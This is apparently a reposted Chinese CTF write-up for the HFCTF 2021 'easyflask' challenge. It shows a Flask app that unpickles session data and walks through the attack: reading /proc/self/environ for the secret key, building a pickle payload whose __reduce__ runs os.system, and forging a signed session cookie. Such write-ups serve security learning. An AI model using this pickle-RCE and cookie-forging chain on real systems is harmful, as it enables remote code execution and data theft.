当前位置:   article > 正文

[HFCTF 2021 Final]easyflask

[HFCTF 2021 Final]easyflask

ctf打着真累。刷题根本刷不完,知识点好多。。。也是好久没写,一直在准备hw,今儿整一个python的反序列化入门吧。呜呜呜,好多反序列化的题。。。

就先跟着提示走就可以了。直到我们找到了这个

  1. #!/usr/bin/python3.6
  2. import os
  3. import pickle
  4. from base64 import b64decode
  5. from flask import Flask, request, render_template, session
  6. app = Flask(__name__)
  7. app.config["SECRET_KEY"] = "*******"
  8. User = type('User', (object,), {
  9. 'uname': 'test',
  10. 'is_admin': 0,
  11. '__repr__': lambda o: o.uname,
  12. })
  13. @app.route('/', methods=('GET',))
  14. def index_handler():
  15. if not session.get('u'):
  16. u = pickle.dumps(User())
  17. session['u'] = u
  18. return "/file?file=index.js"
  19. @app.route('/file', methods=('GET',))
  20. def file_handler():
  21. path = request.args.get('file')
  22. path = os.path.join('static', path)
  23. if not os.path.exists(path) or os.path.isdir(path) \
  24. or '.py' in path or '.sh' in path or '..' in path or "flag" in path:
  25. return 'disallowed'
  26. with open(path, 'r') as fp:
  27. content = fp.read()
  28. return content
  29. @app.route('/admin', methods=('GET',))
  30. def admin_handler():
  31. try:
  32. u = session.get('u')
  33. if isinstance(u, dict):
  34. u = b64decode(u.get('b'))
  35. u = pickle.loads(u)
  36. except Exception:
  37. return 'uhh?'
  38. if u.is_admin == 1:
  39. return 'welcome, admin'
  40. else:
  41. return 'who are you?'
  42. if __name__ == '__main__':
  43. app.run('0.0.0.0', port=80, debug=False)

信息很多,有密钥,有pickle模板。在/admin下 ,很明显的反序列化了。重点在于这个

__reduce__魔术方法的返回值是tuple类型时就可以实现任意代码执行

详情可以看这:https://blog.csdn.net/weixin_45669205/article/details/116274988

我就直接做题了。也是卡了好久。这里可能存在任意文件读取。去读一下环境变量

  1. file?file=/proc/self/environ
  2. 密钥:glzjin22948575858jfjfjufirijidjitg3uiiuuh

我看了好多大佬wp,都是使用公网主机连shell。没有公网主机好麻烦的。所以还可以这么构造

  1. import os
  2. import pickle
  3. from base64 import b64encode
  4. User = type('User', (object,), {
  5. 'uname': 'tyskill',
  6. 'is_admin': 0,
  7. '__repr__': lambda o: o.uname,
  8. '__reduce__': lambda o: (os.system, ("cat /flag>/test2",))
  9. })
  10. u = pickle.dumps(User())
  11. print(b64encode(u).decode())
  12. #这个脚本也要在kali下运行!!!

因为我们要执行命令,所以admin是不是1不重要

运行后:gASVKwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBBjYXQgL2ZsYWc+L3Rlc3QylIWUUpQu

在kali上执行(都做到这了,工具应该都有吧)

  1. 这是解密后的格式:{'u':{'b':'gASVKwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBBjYXQgL2ZsYWc+L3Rlc3QylIWUUpQu'}}
  2. kali加密命令:python3 flask_session_cookie_manager3.py encode -s 'glzjin22948575858jfjfjufirijidjitg3uiiuuh' -t "{'u':{'b':'gASVKwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBBjYXQgL2ZsYWc+L3Rlc3QylIWUUpQu'}}"
  3. session:eyJ1Ijp7ImIiOiJnQVNWS3dBQUFBQUFBQUNNQlhCdmMybDRsSXdHYzNsemRHVnRsSk9VakJCallYUWdMMlpzWVdjK0wzUmxjM1F5bElXVVVwUXUifX0.ZicaKQ.t44JF82CUrZXtW9WygwOrIqqluU

然后把这session拿去访问/admin就可以了。

 这样就不需要公网主机拿shell得到flag。。。

1.那个user类的格式已经在源码里给出来了,我们可以自行添加魔术方法。

2.那个字典格式是用已知的session解密出来的,替换掉里边的b就行。(我在windows运行py是不彳亍的,全程在liunx运行,返回500报错,但是命令已经执行

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop】
推荐阅读
相关标签
  

闽ICP备14008679号